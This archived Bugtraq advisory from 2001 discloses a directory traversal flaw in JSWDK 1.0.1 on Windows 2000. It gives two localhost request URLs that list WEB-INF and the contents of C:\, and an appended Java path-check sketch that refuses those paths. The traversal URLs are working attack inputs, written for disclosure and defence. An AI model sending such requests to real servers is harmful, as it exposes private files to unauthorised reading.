Bugtraq mailing list archives

CHINANSL Security Advisory(CSA-200106)


From: lovehacker <lovehacker () 263 NET>
Date: Wed, 28 Mar 2001 06:48:07 -0000

Topic:
JavaServer Web Dev Kit (JSWDK) 1.0.1 for Win2000 
directory traversal vulnerability

vulnerable:
Microsoft Win2000
    + JSWDK 1.0.1
Other operating systems may also be affected.

discussion:
A security vulnerability has been found in Windows 
NT/2000 systems that have JSWDK 1.0.1 
installed. The vulnerability allows remote attackers to 
access files outside the document root directory.

exploits:
http://localhost:8080/examples//WEB-INF/ 
lists the /WEB-INF/ directory.

http://localhost:8080/../examples//WEB-INF/../../../../../
If JSWDK is installed in c:\, this request lists all 
files and directories in c:\.

solution:
Update JSWDK

Copyright 2000-2001 CHINANSL. All Rights 
Reserved. Terms of use. 

CHINANSL Security Team 
<lovehacker () chinansl com> 
CHINANSL INFORMATION TECHNOLOGY CO.,LTD 
(http://www.chinansl.com)
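
The following is an added example, not part of the advisory and not JSWDK code: a sketch of the request-path check whose absence produces the behaviour described above, run against the two request paths from the advisory. The class name DocRootGuard, the document root "webpages" and the benign sample path are hypothetical, and the request path is assumed to be already percent-decoded by the server.

```java
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.Optional;

public class DocRootGuard {
    // Maps an already percent-decoded request path to a file under docRoot,
    // or returns empty if the request must be refused.
    static Optional<Path> resolve(Path docRoot, String requestPath) {
        Deque<String> stack = new ArrayDeque<>();
        // Treat '\' like '/' (Windows) and skip empty segments such as "//".
        for (String seg : requestPath.replace('\\', '/').split("/")) {
            if (seg.isEmpty() || seg.equals(".")) continue;
            if (seg.equals("..")) {
                if (stack.isEmpty()) return Optional.empty(); // climbs above the root
                stack.removeLast();
            } else {
                stack.addLast(seg);
            }
        }
        try {
            Path root = docRoot.toAbsolutePath().normalize();
            Path target = root;
            for (String seg : stack) {
                // WEB-INF is private to the web application; compare without
                // regard to case because Windows file names are case-insensitive.
                if (seg.equalsIgnoreCase("WEB-INF")) return Optional.empty();
                target = target.resolve(seg);
            }
            target = target.normalize();
            // Final containment check on the fully resolved path.
            return target.startsWith(root) ? Optional.of(target) : Optional.empty();
        } catch (InvalidPathException e) {
            return Optional.empty(); // segment is not a legal file name on this OS
        }
    }

    public static void main(String[] args) {
        Path root = Paths.get("webpages"); // hypothetical document root
        String[] samples = {
            "/examples/index.html",                 // constructed benign request
            "/examples//WEB-INF/",                  // first request path from the advisory
            "/../examples//WEB-INF/../../../../../" // second request path from the advisory
        };
        for (String s : samples) {
            System.out.println(s + " -> "
                + resolve(root, s).map(Path::toString).orElse("REFUSED"));
        }
    }
}
```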

